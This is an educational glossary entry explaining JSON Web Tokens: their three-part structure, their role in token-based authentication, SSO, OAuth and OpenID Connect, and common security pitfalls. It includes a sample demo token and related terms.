JWTs hold paramount importance in cyber security realms, particularly within distributed network architectures, such as modern web applications and microservices. The structure of a JWT is divided into three parts: Header, Payload, and Signature. The Header specifies the token type (JWT) and the signing algorithm being used, such as HMAC SHA256 or RSA. The Payload section contains the claims, which are statements about an entity (typically the user) and additional data. The Signature is used to verify the message wasn’t changed along the way and, in the case of tokens signed with a private key, to verify that the sender is who it claims to be.
JWTs are used in authentication and authorisation mechanisms, where the client exchanges credentials for a JWT token and then includes that token in each request to the server. This token is validated by the server for each request, which verifies its authenticity and ensures the integrity and non-repudiation of the message.
While JWTs bring efficiencies and are easy to implement, they must be handled securely to prevent common vulnerabilities such as none-algorithm attacks (where the server is tricked into accepting an unsigned token), signature stripping, and private key disclosure. Standard practices include using strong algorithms for signing, keeping secret keys secure, validating inputs properly, and not storing sensitive data in the payload.
Despite these concerns, JWTs are widely adopted for their simplicity and robustness, forming a backbone of sessionless authentication systems and standing as a trusted standard in secure data exchange across different services.
Example of a base64 encoded JWT token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c (Try decoding this token with jwt.io)
- Compactness and URL-safe design
- Composed of a Header, Payload, and Signature
- Facilitates token-based authentication and secure data transfer
- Prone to security risks if not properly verified and handled
- Real-World Example: JWTs are used in Single Sign-On (SSO) services where a user logs in once, and the JWT issued is accepted by various other services or applications without requiring the user to log in again.
- Hypothetical Scenario: An IoT ecosystem enrolls devices and uses JWT tokens for each device to authenticate API calls. These tokens are created when a device first connects and registers its credentials securely with the central server, upon which a unique JWT is assigned for its subsequent communications.
- Token-based Authentication: A system that uses security tokens like JWTs to authenticate users instead of traditional session cookies.
- OAuth: An authorisation framework that often uses JWTs for securing API calls and delegating user authorisation.
- OpenID Connect: An authentication layer on top of OAuth 2.0, which can use JWTs to authenticate users and convey the information.
- Claims: Pieces of information asserted about a subject, such as user data, used in JWTs to carry the authenticated user’s properties.
Learn better by watching a video? Here is a YouTube video explaining the concept.